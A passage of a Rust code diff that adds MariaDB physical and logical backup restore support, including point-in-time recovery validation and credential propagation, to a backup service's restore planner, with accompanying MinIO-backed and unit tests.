+            ..Default::default()
+        };
+
+        let created = docker
+            .create_container(
+                Some(
+                    bollard::query_parameters::CreateContainerOptionsBuilder::new()
+                        .name(&name)
+                        .build(),
+                ),
+                config,
+            )
+            .await
+            .ok()?;
+        let guard = MinioGuard {
+            docker: docker.clone(),
+            id: created.id.clone(),
+        };
+        docker
+            .start_container(
+                &created.id,
+                None::<bollard::query_parameters::StartContainerOptions>,
+            )
+            .await
+            .ok()?;
+        tokio::time::sleep(std::time::Duration::from_secs(3)).await;
+        Some((port, guard))
+    }
+
+    /// An `s3_sources::Model` pointing at the local MinIO with an empty
+    /// `bucket_path`, matching the row shape `run_pitr_flow` inserts.
+    #[cfg(feature = "docker-tests")]
+    fn location_test_s3_source(port: u16, bucket: &str) -> temps_entities::s3_sources::Model {
+        temps_entities::s3_sources::Model {
+            id: 1,
+            name: "loc-test-s3".to_string(),
+            bucket_name: bucket.to_string(),
+            region: "us-east-1".to_string(),
+            endpoint: Some(format!("http://127.0.0.1:{port}")),
+            bucket_path: String::new(),
+            access_key_id: LOCATION_TEST_MINIO_ACCESS_KEY.to_string(),
+            secret_key: LOCATION_TEST_MINIO_SECRET_KEY.to_string(),
+            force_path_style: Some(true),
+            is_default: true,
+            created_at: Utc::now(),
+            updated_at: Utc::now(),
+        }
+    }
+
+    /// REGRESSION (Greptile finding on PR #878): a legacy MariaDB *physical*
+    /// backup row with an empty `s3_location` was undiscoverable, because the
+    /// extension allowlist in `resolve_backup_location_from_s3` did not include
+    /// `.mbstream.gz`. That made the backup permanently unrestorable through
+    /// the repair path — a data-safety bug, not a cosmetic one.
+    ///
+    /// This seeds the exact key shape a physical base occupies in a real
+    /// bucket and asserts the resolver now finds it. It also seeds a logical
+    /// `dump.sql.gz` under a *different* service prefix and asserts that one
+    /// still resolves, so the fix is additive rather than a swap.
+    #[cfg(feature = "docker-tests")]
+    #[tokio::test(flavor = "multi_thread", worker_threads = 2)]
+    async fn resolve_backup_location_from_s3_finds_mariadb_physical_and_logical_backups() {
+        // ---- Arrange: real MinIO + real objects at real key shapes --------
+        let Some((port, _minio_guard)) = boot_location_test_minio().await else {
+            return;
+        };
+        let bucket = "restore-location-test";
+        let s3_source = location_test_s3_source(port, bucket);
+        let s3_client = build_s3_client(&S3Credentials {
+            access_key_id: LOCATION_TEST_MINIO_ACCESS_KEY.to_string(),
+            secret_key: LOCATION_TEST_MINIO_SECRET_KEY.to_string(),
+            region: "us-east-1".to_string(),
+            endpoint: s3_source.endpoint.clone(),
+            bucket_name: bucket.to_string(),
+            bucket_path: String::new(),
+            force_path_style: true,
+        });
+        if let Err(e) = s3_client.create_bucket().bucket(bucket).send().await {
+            eprintln!("Could not create MinIO bucket, skipping: {e}");
+            return;
+        }
+
+        let physical_service = "orders-physical";
+        let logical_service = "orders-logical";
+        let physical_key = format!(
+            "external_services/mariadb/{physical_service}/2026/01/01/{}/base.mbstream.gz",
+            uuid::Uuid::new_v4()
+        );
+        let logical_key = format!(
+            "external_services/mariadb/{logical_service}/2026/01/01/{}/dump.sql.gz",
+            uuid::Uuid::new_v4()
+        );
+        // Engines always write a `metadata.json` companion next to the
+        // artifact; seeding it proves the resolver picks the artifact and not
+        // its sidecar.
+        for key in [
+            physical_key.clone(),
+            logical_key.clone(),
+            physical_key.replace("base.mbstream.gz", "metadata.json"),
+            logical_key.replace("dump.sql.gz", "metadata.json"),
+        ] {
+            if let Err(e) = s3_client
+                .put_object()
+                .bucket(bucket)
+                .key(&key)
+                .body(aws_sdk_s3::primitives::ByteStream::from_static(b"seed"))
+                .send()
+                .await
+            {
+                eprintln!("Could not seed object {key}, skipping: {e}");
+                return;
+            }
+        }
+
+        // ---- Act + Assert: physical base is now discoverable --------------
+        let physical =
+            resolve_backup_location_from_s3(&s3_client, &s3_source, "mariadb", physical_service)
+                .await
+                .expect("listing a reachable bucket must not error");
+        eprintln!("resolved physical location = {physical:?}");
+        let physical = physical.expect(
+            "a .mbstream.gz physical base must be discoverable; before the \
+             extension-allowlist fix this returned None and the backup was unrestorable",
+        );
+        assert!(
+            physical.ends_with("base.mbstream.gz"),
+            "resolver must return the physical base artifact, got {physical}"
+        );
+        assert_eq!(physical, physical_key, "resolver must return the exact key");
+
+        // ---- Assert: the logical-dump path did not regress ----------------
+        let logical =
+            resolve_backup_location_from_s3(&s3_client, &s3_source, "mariadb", logical_service)
+                .await
+                .expect("listing a reachable bucket must not error");
+        eprintln!("resolved logical location = {logical:?}");
+        let logical = logical.expect("a .sql.gz logical dump must stay discoverable");
+        assert_eq!(
+            logical, logical_key,
+            "resolver must return the logical dump artifact unchanged"
+        );
+
+        // ---- Assert: an unknown service still resolves to None ------------
+        let missing =
+            resolve_backup_location_from_s3(&s3_client, &s3_source, "mariadb", "no-such-service")
+                .await
+                .expect("listing an empty prefix must not error");
+        assert!(
+            missing.is_none(),
+            "an empty service prefix must resolve to None, got {missing:?}"
+        );
     }
 }

--- a/crates/temps-backup/src/services/restore.rs
+++ b/crates/temps-backup/src/services/restore.rs
@@ -150,7 +150,9 @@ pub enum RestoreRequestMode {
         #[serde(default)]
         parameter_overrides: serde_json::Value,
     },
-    /// Point-in-time recovery. Only valid on WAL-G backups (Postgres).
+    /// Point-in-time recovery. Only valid on a backup that anchors a
+    /// continuous change stream: a WAL-G base (Postgres) or a physical
+    /// `mariadb-backup` base with archived binary logs (MariaDB).
     Pitr {
         /// Whether PITR restores in place or creates a new service.
         to_new_service: bool,
@@ -238,7 +240,7 @@ pub struct RestorePlan {
     /// Backup we'll read from.
     pub source_backup: PlanSourceBackup,
     /// How the restore will be performed: "walg_restore", "pg_dump_restore",
-    /// or "unsupported".
+    /// "mariadb_physical_restore", "mariadb_dump_restore", or "unsupported".
     pub strategy: String,
     /// Ordered list of human-readable actions the orchestrator will take.
     pub steps: Vec<String>,
@@ -272,7 +274,7 @@ pub struct PlanSourceBackup {
     /// True when the original row's `s3_location` was empty and we resolved
     /// a location by probing S3. The UI shows this as a warning.
     pub location_was_resolved: bool,
-    /// "walg", "pg_dump", "unknown".
+    /// "walg", "pg_dump", "mariadb_physical", "mariadb_dump", "unknown".
     pub format: String,
     pub size_bytes: Option<i64>,
     pub created_at: Option<String>,
@@ -464,7 +466,27 @@ impl RestoreService {
         }
 
         // Strategy classification.
-        let strategy = if resolved_location.starts_with("s3://") {
+        //
+        // MariaDB is classified FIRST and entirely on its own terms. Its
+        // logical dump object is named `dump.sql.gz`, so the generic
+        // `.sql.gz` arm below would label it `pg_dump_restore` and the plan
+        // would describe a `pg_restore` that never runs. Its physical base is
+        // `base.mbstream.gz`, which matches no generic arm at all and would
+        // land in `unsupported` even though it is the engine's PITR format.
+        let target_is_mariadb = target.service_type.eq_ignore_ascii_case("mariadb");
+        let strategy = if target_is_mariadb {
+            // Same predicate the MariaDB engine itself dispatches on, so the
+            // preview cannot promise a restore shape the executor won't take.
+            if temps_providers::externalsvc::mariadb::MariaDbService::is_physical_base_location(
+                &resolved_location,
+            ) {
+                "mariadb_physical_restore"
+            } else if resolved_location.ends_with(".sql.gz") {
+                "mariadb_dump_restore"
+            } else {
+                "unsupported"
+            }
+        } else if resolved_location.starts_with("s3://") {
             "walg_restore"
         } else if resolved_location.ends_with(".sql.gz")
             || resolved_location.ends_with(".pgdump.gz")
@@ -474,13 +496,22 @@ impl RestoreService {
             "unsupported"
         };
 
-        // PITR requires a WAL-G backup.
+        // PITR needs a continuous change stream anchored to the base backup:
+        // WAL-G's WAL archive for Postgres, archived binary logs for MariaDB's
+        // physical base. A logical dump anchors nothing in either engine.
         let is_pitr = matches!(mode, RestoreRequestMode::Pitr { .. });
-        if is_pitr && strategy != "walg_restore" {
-            errors.push(
-                "PITR requires a WAL-G backup. The selected backup is pg_dump; choose a WAL-G backup or a different mode."
-                    .into(),
-            );
+        if is_pitr && !matches!(strategy, "walg_restore" | "mariadb_physical_restore") {
+            if target_is_mariadb {
+                errors.push(
+                    "PITR requires a physical (mariadb-backup) base backup. The selected backup is a logical dump; choose a physical backup or a different mode."
+                        .into(),
+                );
+            } else {
+                errors.push(
+                    "PITR requires a WAL-G backup. The selected backup is pg_dump; choose a WAL-G backup or a different mode."
+                        .into(),
+                );
+            }
         }
 
         // Cross-service warning.
@@ -509,16 +540,29 @@ impl RestoreService {
         //              and we run `mongorestore --archive --drop` without
         //              excluding the admin database, so post-restore the
         //              target authenticates with the source's root password.
+        //   MariaDB  — only for a PHYSICAL base. `mariadb-backup --copy-back`
+        //              replaces the entire datadir, `mysql` system schema
+        //              included, so `mysql.user` (the password-hash table)
+        //              becomes the source's. The logical `mariadb_dump`
+        //              backup explicitly excludes the `mysql` schema
+        //              (`SCHEMA_NAME NOT IN (... 'mysql' ...)` in
+        //              temps-backup/src/engines/mariadb_dump.rs), so a dump
+        //              restore leaves the target's credentials untouched —
+        //              which is why `mariadb_dump_restore` is absent from
+        //              the strategy list below.
         //
         // Redis RDB and S3 object copies don't carry auth, so the warning
         // would be misleading for those.
         let engine_preserves_source_credentials = matches!(
             target.service_type.to_ascii_lowercase().as_str(),
-            "postgres" | "mongodb"
+            "postgres" | "mongodb" | "mariadb"
         );
 
         if engine_preserves_source_credentials
-            && (strategy == "walg_restore" || strategy == "pg_dump_restore")
+            && matches!(
+                strategy,
+                "walg_restore" | "pg_dump_restore" | "mariadb_physical_restore"
+            )
         {
             let origin_still_known = backup_row
                 .as_ref()
@@ -595,6 +639,17 @@ impl RestoreService {
                     &mut errors,
                 );
             }
+            "mariadb" => {
+                build_mariadb_steps(
+                    strategy,
+                    &mode,
+                    &container_name,
+                    &resolved_location,
+                    &mut steps,
+                    &mut destructive,
+                    &mut errors,
+                );
+            }
             "s3" | "rustfs" | "blob" | "minio" => {
                 build_object_store_steps(
                     strategy,
@@ -641,6 +696,11 @@ impl RestoreService {
                 format: match strategy {
                     "walg_restore" => "walg".into(),
                     "pg_dump_restore" => "pg_dump".into(),
+                    // Match the engine keys the MariaDB backup engines
+                    // register under, so the plan's `format` lines up with
+                    // `classify_backup_format` and the backup list UI.
+                    "mariadb_physical_restore" => "mariadb_physical".into(),
+                    "mariadb_dump_restore" => "mariadb_dump".into(),
                     _ => "unknown".into(),
                 },
                 size_bytes: backup_row.as_ref().and_then(|b| b.size_bytes),
@@ -850,14 +910,7 @@ impl RestoreService {
                         service_type: target.service_type.clone(),
                     });
                 }
-                if !backup_location.starts_with("s3://") {
-                    return Err(RestoreError::Validation {
-                        message: format!(
-                            "PITR requires a WAL-G backup (s3:// prefix); location was '{}'",
-                            backup_location
-                        ),
-                    });
-                }
+                validate_pitr_backup_location(&target.service_type, &backup_location)?;
                 if *to_new_service
                     && new_service_name
                         .as_ref()
@@ -1142,6 +1195,91 @@ fn validate_pitr_recovery_target(
     Ok(())
 }
 
+/// Reject a PITR request whose backup format cannot anchor a forward-roll.
+///
+/// The test is ENGINE-specific because the two PITR-capable engines record
+/// their base backups differently:
+///
+///   Postgres — WAL-G bases are stored as `s3://…` URLs.
+///   MariaDB  — physical (`mariadb-backup`) bases are stored as a BARE S3 key
+///              ending in `base.mbstream.gz` (see engines/mariadb_physical.rs),
+///              never with a scheme prefix.
+///
+/// Applying the Postgres shape to MariaDB rejected every MariaDB PITR before
+/// it could start — with a "requires WAL-G" message that made no sense for the
+/// engine — even though `MariaDbService::restore_capabilities` advertises
+/// `pitr: true`. MariaDB is classified with the engine's own predicate so this
+/// guard, the plan preview, and the engine all agree on what a physical base is.
+fn validate_pitr_backup_location(
+    target_service_type: &str,
+    backup_location: &str,
+) -> Result<(), RestoreError> {
+    if target_service_type.eq_ignore_ascii_case("mariadb") {
+        if !temps_providers::externalsvc::mariadb::MariaDbService::is_physical_base_location(
+            backup_location,
+        ) {
+            return Err(RestoreError::Validation {
+                message: format!(
+                    "PITR requires a physical (mariadb-backup) base backup; location was '{}'",
+                    backup_location
+                ),
+            });
+        }
+    } else if !backup_location.starts_with("s3://") {
+        return Err(RestoreError::Validation {
+            message: format!(
+                "PITR requires a WAL-G backup (s3:// prefix); location was '{}'",
+                backup_location
+            ),
+        });
+    }
+    Ok(())
+}
+
+/// Which credential-reconciliation steps a restore needs, as
+/// `(preserves_source_credentials, wants_pre_restore_merge)`.
+///
+/// `preserves_source_credentials` means the restored data carries the ORIGIN
+/// service's auth catalog, so the target's stored password must be patched to
+/// the origin's afterwards. `wants_pre_restore_merge` additionally hands the
+/// origin's credentials to the engine up front, which is only safe for OFFLINE
+/// restores (the data swap doesn't authenticate, and the steps after it must
+/// use the credentials the restored data expects).
+///
+///   Postgres — both. The base backup contains `pg_authid`; the restore is
+///              offline.
+///   MongoDB  — patch only. `mongorestore` streams into a LIVE mongod that
+///              still wants the TARGET's password until the restore lands.
+///   MariaDB  — depends on the backup FORMAT, which the location encodes:
+///              a physical base replaces the whole datadir including the
+///              `mysql` system schema (so both, like Postgres), while a
+///              logical `mariadb_dump` explicitly EXCLUDES the `mysql` schema
+///              (see engines/mariadb_dump.rs) and therefore carries no
+///              credentials at all — merging there would authenticate the dump
+///              load with the wrong password and then overwrite the target's
+///              stored password with a credential the target never had,
+///              locking the operator out via UI/CLI.
+///   Redis / S3 / RustFS — neither; their data layer has no auth.
+///
+/// A MariaDB backup row with an empty `s3_location` (legacy rows, backfilled
+/// from S3 later in the worker) classifies as non-physical and therefore skips
+/// both steps: a cross-service PITR forward-roll that fails auth loudly is
+/// strictly better than silently rewriting the target's stored credentials.
+fn credential_propagation_gates(target_service_type: &str, backup_location: &str) -> (bool, bool) {
+    match target_service_type.to_ascii_lowercase().as_str() {
+        "postgres" => (true, true),
+        "mongodb" => (true, false),
+        "mariadb" => {
+            let physical =
+                temps_providers::externalsvc::mariadb::MariaDbService::is_physical_base_location(
+                    backup_location,
+                );
+            (physical, physical)
+        }
+        _ => (false, false),
+    }
+}
+
 /// Worker: marks the run through phases, dispatches to the trait, and
 /// persists target_service_id (when applicable) on success.
 async fn run_restore_worker(
@@ -1334,37 +1472,73 @@ async fn run_restore_inner(
     //   into the config passed to the engine (that breaks the fetch auth)
     //   — we only need to capture it for the post-restore config patch.
     //
+    // MariaDB: YES for a physical base, and it needs the SAME pre-restore
+    //   merge Postgres gets. `mariadb-backup --copy-back` replaces the entire
+    //   datadir including the `mysql` system schema, so `mysql.user` — the
+    //   password-hash table — becomes the source's the moment the swap lands.
+    //   The swap itself is offline (stop container → helper rewrites the
+    //   volume → start), so the merged credentials cannot break it. But the
+    //   step AFTER it does depend on them: `restore_pitr` reuses the same
+    //   `MariaDbConfig` (built from this very `source_config`) to authenticate
+    //   `mariadb-binlog`'s replay against the freshly-restored server, which
+    //   by then only accepts the ORIGIN's password. Without the merge, a
+    //   cross-service MariaDB PITR restores the base and then fails auth on
+    //   the forward-roll — data restored, recovery point silently lost.
+    //
+    //   NO for a logical `mariadb_dump` base. That dump explicitly excludes
+    //   the `mysql` schema (`SCHEMA_NAME NOT IN (…, 'mysql', …)` in
+    //   engines/mariadb_dump.rs), so restoring it leaves the target's own
+    //   `mysql.user` — and therefore its password — completely untouched.
+    //   Merging origin credentials there is actively harmful: the engine
+    //   would authenticate the dump load with the WRONG password, and the
+    //   post-restore `patch_service_password` would overwrite the target's
+    //   stored password with the origin's even though nothing on the target
+    //   changed, locking the operator out of the real credentials via the
+    //   UI/CLI. So MariaDB is gated on the backup FORMAT, matching the
+    //   plan preview (which excludes `mariadb_dump_restore` from the same
+    //   classification) — the location string tells us the format without
+    //   an extra S3 round-trip.
+    //
     // S3/RustFS: NO. No auth in the data layer.
     //
     // Two separate gates. `engine_preserves_source_credentials` drives the
-    // post-restore patch (same for Postgres and Mongo). The pre-restore
-    // merge is Postgres-only because Postgres's restore is offline
-    // (wal-g writes PGDATA, PG replays WAL) so the engine's view of the
-    // "current password" during the fetch doesn't matter. Mongo's is
-    // online so merging too early breaks everything.
-    let engine_preserves_source_credentials = matches!(
-        target_service.service_type.to_ascii_lowercase().as_str(),
-        "postgres" | "mongodb"
-    );
-    let engine_wants_pre_restore_credential_merge =
-        target_service.service_type.eq_ignore_ascii_case("postgres");
+    // post-restore patch (Postgres, Mongo, physical MariaDB). The pre-restore
+    // merge covers the OFFLINE restores (Postgres, physical MariaDB): the
+    // engine's view of the "current password" during the data swap doesn't
+    // matter, and the merged creds are what the restored data will actually
+    // expect. Mongo's restore is online so merging too early breaks the
+    // mongorestore auth.
+    //
+    // See `credential_propagation_gates` for the per-engine (and, for MariaDB,
+    // per-FORMAT) reasoning; it is a free function so the matrix is unit-tested.
+    let (engine_preserves_source_credentials, engine_wants_pre_restore_credential_merge) =
+        credential_propagation_gates(&target_service.service_type, &backup_model.s3_location);
 
     let mut origin_password_for_post_restore_patch: Option<String> = None;
+    let mut origin_root_password_for_post_restore_patch: Option<String> = None;
     if engine_preserves_source_credentials {
         if let Some(origin_id) = origin_service_id {
             if origin_id != target_service.id {
                 match mgr.get_service_config(origin_id).await {
                     Ok(origin_cfg) => {
                         if engine_wants_pre_restore_credential_merge {
-                            // Postgres only: merge origin credentials into
-                            // the config we pass to the engine. Restore is
-                            // offline — the merged creds will match the
-                            // restored pg_authid.
+                            // Offline engines (Postgres, MariaDB): merge origin
+                            // credentials into the config we pass to the engine.
+                            // The restore replaces the auth catalog wholesale
+                            // (pg_authid / mysql.user), so the merged creds are
+                            // exactly what the restored server will expect.
                             if let (Some(target_params), Some(origin_params)) = (
                                 source_config.parameters.as_object_mut(),
                                 origin_cfg.parameters.as_object(),
                             ) {
-                                for key in ["password", "username", "database"] {
+                                // `root_password` is MariaDB's admin credential
+                                // — the one `mariadb-binlog` replay and every
+                                // post-restore admin exec authenticate with —
+                                // and it lives in the restored `mysql.user`
+                                // table just like `password` does. Postgres
+                                // configs have no such key, so the lookup is a
+                                // no-op there rather than a behavior change.
+                                for key in ["password", "root_password", "username", "database"] {
                                     if let Some(v) = origin_params.get(key).cloned() {
                                         target_params.insert(key.to_string(), v);
                                     }
@@ -1406,6 +1580,18 @@ async fn run_restore_inner(
                             .get("password")
                             .and_then(|v| v.as_str())
                             .map(String::from);
+                        // MariaDB keeps a SECOND credential in its config, the
+                        // `root_password` used for every admin operation
+                        // (backup, binlog replay, SQL exec). It lives in the
+                        // restored `mysql.user` table too, so leaving the
+                        // stored copy stale would break the next backup — the
+                        // failure would surface hours later, far from this
+                        // restore. Absent for every other engine.
+                        origin_root_password_for_post_restore_patch = origin_cfg
+                            .parameters
+                            .get("root_password")
+                            .and_then(|v| v.as_str())
+                            .map(String::from);
                     }
                     Err(e) => {
                         warn!(
@@ -1418,8 +1604,8 @@ async fn run_restore_inner(
         }
     } else {
         info!(
-            "Engine '{}' does not propagate source credentials; skipping origin-password merge for target service {}",
-            target_service.service_type, target_service.id
+            "Backup '{}' for engine '{}' does not propagate source credentials; skipping origin-password merge for target service {}",
+            backup_model.s3_location, target_service.service_type, target_service.id
         );
     }
 
@@ -1612,7 +1798,14 @@ async fn run_restore_inner(
         // with the origin's plaintext value so the UI/env vars/CLI reflect
         // the credentials that actually work post-restore.
         if let Some(new_password) = origin_password_for_post_restore_patch.as_ref() {
-            if let Err(e) = patch_service_password(&db, &enc, target_service.id, new_password).await
+            if let Err(e) = patch_service_password(
+                &db,
+                &enc,
+                target_service.id,
+                new_password,
+                origin_root_password_for_post_restore_patch.as_deref(),
+            )
+            .await
             {
                 // Don't fail the restore over a config patch — data is
                 // restored, user can reset password manually. Log loudly.
@@ -1633,17 +1826,24 @@ async fn run_restore_inner(
     Ok(target_service_id)
 }
 
-/// Rewrite the target service's encrypted `config.password` field.
+/// Rewrite the target service's encrypted `config.password` (and, when the
+/// engine has one, `config.root_password`) field.
 ///
 /// Called after an in-place restore so the credentials stored in the Temps
 /// DB match what's actually in the restored cluster (which carries the
 /// origin service's password hashes). Everything else about the config
 /// — image, port, volume, container name — stays the target's.
+///
+/// `new_root_password` is `Some` only for engines that keep a separate admin
+/// credential inside the restored auth catalog (MariaDB's `mysql.user` root
+/// row). Postgres and MongoDB pass `None`, leaving their configs untouched
+/// apart from `password`.
 async fn patch_service_password(
     db: &DatabaseConnection,
     enc: &Arc<temps_core::EncryptionService>,
     service_id: i32,
     new_password: &str,
+    new_root_password: Option<&str>,
 ) -> Result<(), RestoreError> {
     use sea_orm::{ActiveModelTrait, ActiveValue::Set};
 
@@ -1677,6 +1877,17 @@ async fn patch_service_password(
         "password".to_string(),
         serde_json::Value::String(new_password.to_string()),
     );
+    // Only overwrite `root_password` when the caller actually resolved one and
+    // the target config already has the key — never introduce a credential
+    // field an engine doesn't understand.
+    if let Some(root_password) = new_root_password {
+        if params.contains_key("root_password") {
+            params.insert(
+                "root_password".to_string(),
+                serde_json::Value::String(root_password.to_string()),
+            );
+        }
+    }
 
     let re_serialized = serde_json::to_string(&params).map_err(|e| RestoreError::Internal {
         reason: format!("Failed to re-serialize patched config: {}", e),
@@ -1816,6 +2027,9 @@ fn engine_container_name(engine_lower: &str, service_name: &str) -> String {
         "postgres" => format!("postgres-{}", service_name),
         "redis" => format!("redis-{}", service_name),
         "mongodb" => format!("mongodb-{}", service_name),
+        // Matches MariaDbService::get_container_name() and the dispatch-side
+        // PITR-tools probe in engines/dispatch.rs, both `mariadb-{name}`.
+        "mariadb" => format!("mariadb-{}", service_name),
         "s3" => format!("rustfs-{}", service_name),
         "rustfs" => format!("rustfs-{}", service_name),
         "blob" | "kv" | "minio" => format!("{}-{}", engine_lower, service_name),
@@ -1933,6 +2147,202 @@ fn build_postgres_steps(
         _ => {
             errors.push(
                 "Backup format could not be classified as either WAL-G or pg_dump. Restore is not supported."
+                    .into(),
+            );
+        }
+    }
+}
+
+/// MariaDB restore plan.
+///
+/// Structurally the closest analog to Postgres: the PITR path is OFFLINE
+/// (stop container → replace the datadir → start → forward-roll), not an
+/// online stream like Mongo's. The two formats:
+///
+/// - `mariadb_physical_restore` — a gzipped `mariadb-backup --stream=mbstream`
+///   base (`base.mbstream.gz`). Restore is the documented prepare/copy-back
+///   dance run inside an ephemeral helper container that shares the service's
+///   data volume (`volumes_from`), because the datadir must be replaced while
+///   the server is down. PITR then replays archived binary logs on top.
+/// - `mariadb_dump_restore` — a gzipped `mariadb-dump` of the user databases
+///   (`dump.sql.gz`), applied by feeding it to the `mariadb` client inside the
+///   running container. No binlog anchor, so no PITR.
+///
+/// **Credential side-effect (physical only):** `--copy-back` replaces the whole
+/// datadir including the `mysql` system schema, so `mysql.user` — the
+/// password-hash table — becomes the source's. The logical dump deliberately
+/// skips the `mysql` schema and therefore leaves the target's credentials
+/// alone.
+fn build_mariadb_steps(
+    strategy: &str,
+    mode: &RestoreRequestMode,
+    container_name: &str,
+    resolved_location: &str,
+    steps: &mut Vec<String>,
+    destructive: &mut bool,
+    errors: &mut Vec<String>,
+) {
+    // The physical restore sequence, shared by in-place, new-service, and the
+    // base half of PITR. Kept in one place so the three previews can't drift
+    // from each other (they all run `physical_restore_into_container`).
+    let physical_sequence = |target: &str, steps: &mut Vec<String>| {
+        steps.push(format!(
+            "Download {} from S3 and gunzip it to a raw mbstream on the host",
+            resolved_location
+        ));
+        steps.push(format!(
+            "Disable {}'s restart policy and stop it so the datadir volume is free",
+            target
+        ));
+        steps.push(format!(
+            "Create an ephemeral helper container sharing {}'s volumes, upload the mbstream onto it, and start it",
+            target
+        ));
+        steps.push(
+            "Helper: `mbstream -x` into a staging dir, `mariadb-backup --prepare` (apply redo logs), wipe /var/lib/mysql, `mariadb-backup --copy-back`, chown to mysql"
+                .into(),
+        );
+        steps.push("Remove the helper and re-enable the restart policy".into());
+        steps.push(format!(
+            "Start {} on the restored datadir and wait for it to report healthy",
+            target
+        ));
+    };
+
+    match strategy {
+        "mariadb_physical_restore" => match mode {
+            RestoreRequestMode::InPlace => {
+                *destructive = true;
+                physical_sequence(container_name, steps);
+                steps.push(format!(
+                    "The restored datadir carries the SOURCE's `mysql` system schema, so {} now authenticates with the source's root/user passwords",
+                    container_name
+                ));
+                steps.push(
+                    "Orchestrator patches the target service's stored config with the source's password so UI/env/CLI still work"
+                        .into(),
+                );
+            }
+            RestoreRequestMode::NewService { name, .. } => {
+                steps.push(format!(
+                    "Allocate a new MariaDB container 'mariadb-{}' on a fresh volume and port (image + credentials cloned from the target)",
+                    name
+                ));
+                physical_sequence(&format!("mariadb-{}", name), steps);
+                steps.push(
+                    "Because the copy-back replays the source's `mysql` schema, the new service's accounts are the SOURCE's, not the freshly-generated ones"
+                        .into(),
+                );
+                steps.push("Persist the new service in the database".into());
+            }
+            RestoreRequestMode::Pitr {
+                to_new_service,
+                new_service_name,
+                target,
+            } => {
+                *destructive = !*to_new_service;
+                let target_container = if *to_new_service {
+                    let name = new_service_name.as_deref().unwrap_or("<unnamed>");
+                    steps.push(format!(
+                        "Provision new service 'mariadb-{}' just like the new_service flow",
+                        name
+                    ));
+                    format!("mariadb-{}", name)
+                } else {
+                    container_name.to_string()
+                };
+                steps.push(
+                    "Read the base's metadata.json companion for its binlog coordinates (binlog_file / binlog_position); reject the restore if the base was taken without binary logging"
+                        .into(),
+                );
+                physical_sequence(&target_container, steps);
+                steps.push(
+                    "Read the binlog manifest.json under the SOURCE service's binlog/ prefix and download + gunzip every archived segment at or after the base's binlog_file"
+                        .into(),
+                );
+                match target {
+                    RecoveryTarget::Time { .. } => {
+                        steps.push(
+                            "Set the recovery target (type: timestamp) as `mariadb-binlog --stop-datetime`"
+                                .into(),
+                        );
+                    }
+                    RecoveryTarget::Lsn { .. } => {
+                        steps.push(
+                            "Set the recovery target (type: lsn, given as `binlog_file:position`) as `mariadb-binlog --stop-position`. The named file must be the LAST segment replayed, otherwise the position is ambiguous across segments and the restore is rejected."
+                                .into(),
+                        );
+                    }
+                    // `recovery_target_to_stop_flag` rejects both of these
+                    // before touching any data, so the plan must surface them
+                    // as errors rather than describing a step that can't run.
+                    RecoveryTarget::Xid { .. } => {
+                        errors.push(
+                            "MariaDB PITR does not support an xid/GTID recovery target yet — use a timestamp, or an lsn given as `binlog_file:position`."
+                                .into(),
+                        );
+                    }
+                    RecoveryTarget::Name { .. } => {
+                        errors.push(
+                            "MariaDB has no named-restore-point equivalent — use a timestamp recovery target, or an lsn given as `binlog_file:position`."
+                                .into(),
+                        );
+                    }
+                }
+                steps.push(format!(
+                    "Upload the segments into {} and replay them in ONE `mariadb-binlog --disable-log-bin --start-position=<base position>` pass piped into the mariadb client, stopping at the target",
+                    target_container
+                ));
+                steps.push(format!(
+                    "Clean up the uploaded segments; {} is left running at the recovered point",
+                    target_container
+                ));
+            }
+        },
+        "mariadb_dump_restore" => match mode {
+            RestoreRequestMode::InPlace => {
+                *destructive = true;
+                steps.push(format!(
+                    "Download {} from S3 and gunzip it to a .sql file on the host",
+                    resolved_location
+                ));
+                steps.push(format!(
+                    "Upload the .sql into the RUNNING {} at /tmp (the container is not stopped)",
+                    container_name
+                ));
+                steps.push(
+                    "Feed it to the `mariadb` client as root (`mariadb -uroot < /tmp/...`); the dump's `DROP TABLE`/`CREATE` statements replace the dumped databases".into(),
+                );
+                steps.push(
+                    "The dump excludes the `mysql` system schema, so the target keeps its own accounts and passwords".into(),
+                );
+                steps.push("Remove the uploaded .sql from the container".into());
+            }
+            RestoreRequestMode::NewService { name, .. } => {
+                steps.push(format!(
+                    "Allocate a new MariaDB container 'mariadb-{}' on a fresh volume and port",
+                    name
+                ));
+                steps.push(
+                    "Download + gunzip the dump and apply it via the new container's mariadb client"
+                        .into(),
+                );
+                steps.push(
+                    "The new service keeps its freshly-generated credentials (the dump carries no `mysql` schema)"
+                        .into(),
+                );
+                steps.push("Persist the new service in the database".into());
+            }
+            RestoreRequestMode::Pitr { .. } => {
+                errors.push(
+                    "PITR is not possible with a mariadb_dump backup — a logical dump records no binlog anchor to replay from. Choose a physical (mariadb-backup) base backup."
+                        .into(),
+                );
+            }
+        },
+        _ => {
+            errors.push(
+                "Backup format could not be classified as either a physical mariadb-backup base (base.mbstream.gz) or a logical mariadb-dump (.sql.gz). Restore is not supported."
                     .into(),
             );
         }
@@ -2255,6 +2665,243 @@ mod tests {
         assert_eq!(slugify("My Restored DB!!"), "my-restored-db");
         assert_eq!(slugify("   leading   "), "leading");
         assert_eq!(slugify("UPPER_case"), "upper-case");
+    }
+
+    // ---- MariaDB restore plan -------------------------------------------
+
+    #[test]
+    fn engine_container_name_matches_mariadb_provider_convention() {
+        // Must equal MariaDbService::get_container_name() and the container
+        // dispatch.rs probes; a mismatch silently produces a plan naming a
+        // container that doesn't exist.
+        assert_eq!(engine_container_name("mariadb", "orders"), "mariadb-orders");
+    }
+
+    fn mariadb_steps(
+        strategy: &str,
+        mode: &RestoreRequestMode,
+        location: &str,
+    ) -> (Vec<String>, bool, Vec<String>) {
+        let mut steps = Vec::new();
+        let mut destructive = false;
+        let mut errors = Vec::new();
+        build_mariadb_steps(
+            strategy,
+            mode,
+            "mariadb-orders",
+            location,
+            &mut steps,
+            &mut destructive,
+            &mut errors,
+        );
+        (steps, destructive, errors)
+    }
+
+    #[test]
+    fn mariadb_physical_in_place_is_destructive_and_describes_the_copy_back() {
+        let (steps, destructive, errors) = mariadb_steps(
+            "mariadb_physical_restore",
+            &RestoreRequestMode::InPlace,
+            "external_services/mariadb/orders/2026/05/01/uuid/base.mbstream.gz",
+        );
+        assert!(destructive, "replacing the datadir in place is destructive");
+        assert!(errors.is_empty(), "unexpected errors: {:?}", errors);
+        let joined = steps.join("\n");
+        assert!(joined.contains("mbstream"));
+        assert!(joined.contains("--prepare"));
+        assert!(joined.contains("--copy-back"));
+        assert!(
+            joined.contains("mysql` system schema"),
+            "the plan must warn that the source's credentials come with the datadir"
+        );
+    }
+
+    #[test]
+    fn mariadb_physical_new_service_is_not_destructive() {
+        let (steps, destructive, errors) = mariadb_steps(
+            "mariadb_physical_restore",
